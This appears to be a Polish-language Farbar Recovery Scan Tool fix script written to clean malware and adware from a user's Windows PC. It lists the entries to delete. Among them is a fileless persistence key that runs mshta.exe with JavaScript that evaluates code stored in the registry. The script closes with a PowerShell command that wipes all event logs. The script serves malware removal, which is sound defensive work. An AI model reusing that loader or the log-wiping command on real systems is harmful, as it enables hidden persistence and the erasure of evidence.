CloseProcesses:
CreateRestorePoint:
AVG (HKLM\...\{67975182-2130-493C-A58F-7C2604B8852A}) (Version: 1.191.1 - AVG Technologies) Hidden
FMW 1 (HKLM\...\{AF4C2E26-9BE2-4813-B1A4-9CA0717374D3}) (Version: 1.203.1 - AVG Technologies) Hidden
HKU\.DEFAULT\Software\Classes\24c67: "C:\Windows\system32\mshta.exe" "javascript:OQW5V8d="KINC8C";sd4=new ActiveXObject("WScript.Shell");zn82MSeY="s456";U1mfQ=sd4.RegRead("HKCU\\software\\xdlnnbhy\\pwis");jc46amn="z6ZQHDF1";eval(U1mfQ);sDjsY81="8wIDm";" <==== UWAGA
ShellIconOverlayIdentifiers: [00avg] -> {472083B0-C522-11CF-8763-00608CC02F24} =>  -> Brak pliku
ContextMenuHandlers1: [AVG] -> [CC]{472083B1-C522-11CF-8763-00608CC02F24} =>  -> Brak pliku
Task: {052344CC-5F15-494C-AC3C-63703D1F56A6} - System32\Tasks\AVGPCTuneUp_Task_BkGndMaintenance => C:\Program Files (x86)\AVG\AVG PC TuneUp\tuscanx.exe
Task: {090E51E9-DE77-46C4-B863-E7AA85EFCC13} - System32\Tasks\Neaij => C:\PROGRA~1\GROOVE~1\Urugn.bat <==== UWAGA
Task: {201010CF-7892-45FB-9318-06C99B3843E0} - System32\Tasks\{6CC7AE75-1F51-4A29-B5D6-915D820D259A} => C:\Windows\system32\pcalua.exe -a "C:\Program Files (x86)\Common Files\Flexflex\uninstall.exe" -c -f "C:\Program Files (x86)\Common Files\Flexflex\uninstall.dat" -a uninstallme 26BACF29-13DA-4C96-9D39-DC28055FAD39 DeviceId=7c2e72e5-4ab7-7370-dd06-78cffe1b09eb BarcodeId=50036003 ChannelId=3 DistributerName=APSFCovus
Task: {22707340-77A8-42EC-B11B-FA3EA2A674E8} - System32\Tasks\Comp Pool2 => C:\Windows\system32\rundll32.exe "C:\Users\Mateusz\AppData\Local\Comp Pool\{15460D1F-D559-48C7-F89C-E41222776F91}\ifhokjm.dll",#1 <==== UWAGA
Task: {2A16F7C8-3510-40E5-AB45-1EE68699C63D} - System32\Tasks\{4D73C0C0-24C3-4D4A-8B20-FEE6686973C6} => C:\Windows\system32\pcalua.exe -a C:\Users\Mateusz\AppData\Roaming\yoursearching\UninstallManager.exe -c  -ptid=face
Task: {2E0E05E2-3A5F-474D-A899-6FA9CA8F028E} - System32\Tasks\{1E479D74-5C87-4F3B-A76E-602FE99B3825} => C:\Windows\system32\pcalua.exe -a E:\setup.exe -d E:\
Task: {322DE7E1-D2EE-4866-9273-D4682BDED373} - System32\Tasks\{D4C5F05F-5983-4FF7-A6DE-91C53DBD469B} => C:\Windows\system32\pcalua.exe -a "C:\Program Files (x86)\Common Files\Flexflex\uninstall.exe" -c -f "C:\Program Files (x86)\Common Files\Flexflex\uninstall.dat" -a uninstallme 26BACF29-13DA-4C96-9D39-DC28055FAD39 DeviceId=7c2e72e5-4ab7-7370-dd06-78cffe1b09eb BarcodeId=50036003 ChannelId=3 DistributerName=APSFCovus
Task: {34E247B8-4E85-4451-8483-E798F5CB999C} - System32\Tasks\{765DC2F4-E78A-4586-87D3-ECD1397A01BE} => C:\Windows\system32\pcalua.exe -a E:\setup.exe -d E:\
Task: {510D25F7-3DE7-4129-B956-4FBC4EF3C673} - System32\Tasks\AVG EUpdate Task => avgsetupx.exe
Task: {55B74A69-DA09-43F4-88FE-C3FF3C54A4D9} - System32\Tasks\Cizutain Monitor => C:\Program Files (x86)\Porikgerceent\ghugther.exe
Task: {687AB33B-A3BF-4CD8-BC13-FEF03F6FFB3D} - System32\Tasks\{97D07746-D72F-46B9-8476-3B1D7515E414} => C:\Windows\system32\pcalua.exe -a "C:\Program Files (x86)\mpck\uninstaller.exe"
Task: {A6B9A418-C4CA-42E8-BCCC-BDD037F9F3B0} - System32\Tasks\{6EF9EC59-F759-44AB-B659-806D3BC869F9} => C:\Windows\system32\pcalua.exe -a "C:\Users\Mateusz\Downloads\Pro Evolution Soccer 2017.RePack\Redist\directx.exe" -d "C:\Users\Mateusz\Downloads\Pro Evolution Soccer 2017.RePack\Redist"
Task: {D3B45A62-CCDD-4866-ACFC-AEBA76155F2E} - System32\Tasks\Vunersharaqeent Mapper => C:\Program Files (x86)\Phodelefufasp\reinik.exe
Task: {EABC7F07-392F-429F-BCC8-F5E36F54DA3A} - System32\Tasks\{EA7655C4-EECF-4E94-977D-B26A75A98EDD} => C:\Windows\system32\pcalua.exe -a "C:\Program Files (x86)\IgrzyskaZimowePL\unins000.exe"
Task: {F005A435-757B-4CFF-BFAE-DF6914AF97EF} - System32\Tasks\Drovatystqasp Module => C:\Program Files (x86)\Anisat\notasp.exe
AlternateDataStreams: C:\ProgramData\TEMP:6BE50C2B [464]
AlternateDataStreams: C:\Users\Public\AppData:CSM [480]
HKLM\SOFTWARE\Policies\Microsoft\Windows Defender: Ograniczenia <==== UWAGA
HKU\S-1-5-21-1759047646-105122766-3284860367-1000\...\Run: [Google Chrome] => C:\Users\Mateusz\AppData\Roaming\Google Chrome\nVJCg2.lnk [731 2016-01-14] ()
HKU\S-1-5-18\...\Run: [CUQXLJUMB7RYEH5] => "C:\Program Files\F7AVSBMC1V\F7AVSBMC1.exe"
HKU\S-1-5-18\...\Run: [ULR80VQVMQPRNNC] => "C:\Program Files\OVUTFTGQZ5\OVUTFTGQZ.exe"
HKU\S-1-5-18\...\Run: [TCoSy95gr9.exe] => C:\Program Files\OVUTFTGQZ5\LR80VQVMQPRNNC7EP5PFERM\TCoSy95gr9.exe -r1_1 -r2_1
HKU\S-1-5-18\...\RunOnce: [AXCtfLOgbO.exe] => C:\Program Files\OVUTFTGQZ5\LR80VQVMQPRNNC7EP5PFERM\AXCtfLOgbO.exe 2 0
HKLM\...\Providers\kdlalg08: C:\Program Files (x86)\Vunersharaqeent Mapper\local64spl.dll <==== UWAGA
ShellExecuteHooks: Brak nazwy - {373CE130-2BBD-11E7-B925-64006A5CFC23} -  -> Brak pliku
ShellExecuteHooks: Brak nazwy - {A283152C-2BBD-11E7-BB11-64006A5CFC23} -  -> Brak pliku
ProxyServer: [S-1-5-21-1759047646-105122766-3284860367-1000] => http=127.0.0.1:8080;https=127.0.0.1:8080
Tcpip\..\Interfaces\{4CC2761F-2022-42D4-B29B-2007AFFB42E0}: [DhcpNameServer] 62.179.1.62 62.179.1.63
HKLM\Software\Microsoft\Internet Explorer\Main,Start Page = 
HKLM\Software\Wow6432Node\Microsoft\Internet Explorer\Main,Start Page = 
HKLM\Software\Microsoft\Internet Explorer\Main,Search Page = 
HKLM\Software\Wow6432Node\Microsoft\Internet Explorer\Main,Search Page = 
HKLM\Software\Microsoft\Internet Explorer\Main,Default_Page_URL = 
HKLM\Software\Wow6432Node\Microsoft\Internet Explorer\Main,Default_Page_URL = 
HKLM\Software\Microsoft\Internet Explorer\Main,Default_Search_URL = 
HKLM\Software\Wow6432Node\Microsoft\Internet Explorer\Main,Default_Search_URL = 
HKLM\Software\Microsoft\Internet Explorer\Main,Local Page = 
HKLM\Software\Wow6432Node\Microsoft\Internet Explorer\Main,Local Page = 
HKU\.DEFAULT\Software\Microsoft\Internet Explorer\Main,Search Page = hxxp://www.microsoft.com/isapi/redir.dll?prd=ie&ar=iesearch
HKU\.DEFAULT\Software\Microsoft\Internet Explorer\Main,Start Page = hxxp://www.microsoft.com/isapi/redir.dll?prd=ie&ar=msnhome
HKU\S-1-5-21-1759047646-105122766-3284860367-1000\Software\Microsoft\Internet Explorer\Main,Search Page = hxxps://%66%65%65%64.%73%6F%6E%69%63-%73%65%61%72%63%68.%63%6F%6D/?p=mKO_AwFzXIpYRaHdGIjVkxlyIP4NYe17aVLWuxkYK9BNIFBtjCcHTr3C-zRzj-qEa8nS-0KZLSsKnXfAXltRwAfbsK_eucFKtHhecJAuRbJrBEnwg9ovz9c6q3M-tV4oLnrt-GQhqPOyaZjMuBVDyUYqiu39-bbcTtrKnGhJgUfggwO1T5fexDUkJwFRLZ2qHZ6UeTHz5ZHA&q={searchTerms}
HKU\S-1-5-21-1759047646-105122766-3284860367-1000\Software\Microsoft\Internet Explorer\Main,Start Page = hxxps://%66%65%65%64.%73%6E%61%70%64%6F.%63%6F%6D/?p=mKO_AwFzXIpYRaHdGIjVkxlyIP4NYe17aVLWuxkYK9BNIFBtjCcHTr3C-zRzj-qEa8nS-0KZLSsKnXfAXltRwAfbsK_eucFKtHhecJAuRbJrBEnwg9YDzRVxwLPHTW9jvt8IrXmzHbsY8ShT0Dnoeu8DnOJDJtGrUSQJrjOOelCfqmWAPD5zOrsgTXm7qWSkp4aHE096tWnv
HKU\S-1-5-21-1759047646-105122766-3284860367-1000\Software\Microsoft\Internet Explorer\Main,Default_Page_URL = hxxp://www.komputerswiat.pl/#utm_source=microsoft-word-2007&utm_medium=nasz-downloader&utm_campaign=home-page-set
HKU\S-1-5-21-1759047646-105122766-3284860367-1000\Software\Microsoft\Internet Explorer\Main,Secondary Start Pages = hxxp://www.msn.com/?pc=U453&ocid=U453DHP&osmkt=pl-pl
SearchScopes: HKLM-x32 -> DefaultScope - brak wartości
SearchScopes: HKU\S-1-5-21-1759047646-105122766-3284860367-1000 -> {0633EE93-D776-472f-A0FF-E1416B8B2E3A} URL = hxxp://www.bing.com/search?FORM=U453DF&PC=U453&q={searchTerms}&src=IE-SearchBox
FF Plugin: @microsoft.com/GENUINE -> disabled [Brak pliku]
FF Plugin-x32: @microsoft.com/GENUINE -> disabled [Brak pliku]
CHR Profile: C:\Users\Mateusz\AppData\Local\Google\Chrome\User Data\ChromeDefaultData [2017-10-17] <==== UWAGA
CHR Profile: C:\Users\Mateusz\AppData\Local\Google\Chrome\User Data\ChromeDefaultData2 [2017-10-17] <==== UWAGA
CHR HKU\.DEFAULT\SOFTWARE\Google\Chrome\Extensions\...\Chrome\Extension: [jlcgehabolcakkjhgmgpkagpolbjlhfa] - hxxps://clients2.google.com/service/update2/crx
CHR HKLM-x32\...\Chrome\Extension: [efaidnbmnnnibpcajpcglclefindmkaj] - hxxps://clients2.google.com/service/update2/crx
S2 avgsvc; Brak ImagePath
U5 AppMgmt; C:\Windows\system32\svchost.exe [27136 2009-07-14] (Microsoft Corporation) <==== UWAGA (Brak ServiceDLL)
S3 RtlWlanu; Brak ImagePath
S3 catchme; \??\C:\ComboFix\catchme.sys [X]
S3 GPU-Z; \??\C:\Users\Mateusz\AppData\Local\Temp\GPU-Z.sys [X] <==== UWAGA
2018-02-11 19:16 - 2018-02-11 19:17 - 000000000 ____D C:\AdwCleaner
2016-06-07 12:11 - 2016-06-07 12:11 - 000000034 _____ () C:\Program Files\Common Files\9E3EC1B1.zq
2016-01-04 14:58 - 2015-11-22 11:51 - 000507904 _____ () C:\Users\Mateusz\AppData\Roaming\10101.exe
C:\Users\Mateusz\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Flvto YouTube Downloader.lnk
C:\Users\Mateusz\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Uninstall Flvto YouTube Downloader.lnk
C:\Users\Mateusz\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\StartMenu\Core Temp.lnk
C:\Users\Mateusz\AppData\Local\Comp Pool
C:\Users\Mateusz\AppData\Roaming\Google Chrome\nVJCg2.lnk
C:\Program Files (x86)\Vunersharaqeent Mapper
C:\Program Files\F7AVSBMC1V
C:\Program Files\OVUTFTGQZ5
EmptyTemp:
Powershell: wevtutil el | Foreach-Object {wevtutil cl "$_"}
CMD: ipconfig /flushdns